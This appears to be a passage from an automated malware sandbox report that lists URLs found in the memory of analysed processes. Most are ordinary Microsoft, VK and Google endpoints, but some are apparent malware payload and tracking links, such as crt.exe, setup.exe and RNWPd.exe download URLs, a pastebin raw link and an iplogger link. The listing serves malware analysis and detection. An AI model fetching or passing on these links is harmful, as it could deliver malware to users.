Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/retention.srf
Source: svchost.exe, 00000034.00000002.2848786345.000001F4D9671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com:443/RST2.srf
Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
Source: svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJ
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.
Source: svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-
Source: svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfen
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.vk.com/
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.vk.com/?act=login
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.vk.com/?act=logout&hash=d4e90dd89b51cf03c1&_origin=https%3A%2F%2Fvk.com&lrt=BDpxh3TFcr
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lop.foxesjoy.com/
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1408547715.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lop.foxesjoy.com/ssl/crt.exe
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1408547715.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lop.foxesjoy.com/ssl/crt.exe8
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457084497.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1453551457.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1408547715.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457040379.00000000043C7000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lop.foxesjoy.com/ssl/crt.exeb_
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457084497.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1453551457.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1408547715.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457040379.00000000043C7000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lop.foxesjoy.com/ssl/crt.exeh
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1408547715.00000000043C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lop.foxesjoy.com/ssl/crt.exez
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lop.foxesjoy.com:80/ssl/crt.exeBt
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://maps.googleapis.com
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com/
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.000000000062B000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com/525403/setup.exe
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com/525403/setup.exe8
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com/525403/setup.exeI
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com/525403/setup.exeU
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com/525403/setup.exeom/a
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com:80/525403/setup.exe
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com:80/525403/setup.exeAy
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com:80/525403/setup.exeeska
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com:80/525403/setup.exehudp(
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1257115899.0000000000471000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://orion.ts.360.com/promo/opera?ch=%s&sch=%s&ver=%s&lan=%s&os=%s&mid=%s&mver=%s&time=%I64d/down
Source: explorer.exe, 00000024.00000000.1465540565.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://papi.vk.com/pushsse/ruim
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002ABC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002961000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/V6VJsrV3
Source: lgX7lgUL1w.exe, 00000000.00000002.1214500875.00000233C7000000.00000004.00001000.00020000.00000000.sdmp, lgX7lgUL1w.exe, 00000000.00000002.1213051292.00000233C4D27000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2511302805.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://platform.twitter.com
Source: explorer.exe, 00000024.00000000.1465540565.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://r.mradx.net
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com
Source: lgX7lgUL1w.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://securepubads.g.doubleclick.net
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F55000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://signup.live.com/signup.aspx
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/css/al/base.3a6f1d6d.css
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/css/al/common.e499224c.css
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/css/al/fonts_cnt_async.4881739c.css
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/css/al/fonts_utf.7fa94ada.css
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/css/al/vkui.c63ec9ec.css
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/css/fonts/VKSansDisplayDemiBoldFaux.v100.woff2
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.vk.me
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stats.vk-portal.net
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002A90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sun6-20.userapi.com/c909228/u5294803/docs/d35/91095a9a6f06/gewgdggrwh_20240521161330.bmp?ext
Source: svchost.exe, 00000009.00000003.1390225011.000002B171643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000009.00000003.1390225011.000002B171643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000009.00000003.1390225011.000002B171643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000009.00000003.1389103968.000002B17165D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000009.00000002.1402242480.000002B17162B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000009.00000003.1390262007.000002B171657000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1404251431.000002B171658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://telegram.org
Source: svchost.exe, 00000009.00000003.1390262007.000002B171657000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1404251431.000002B171658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com
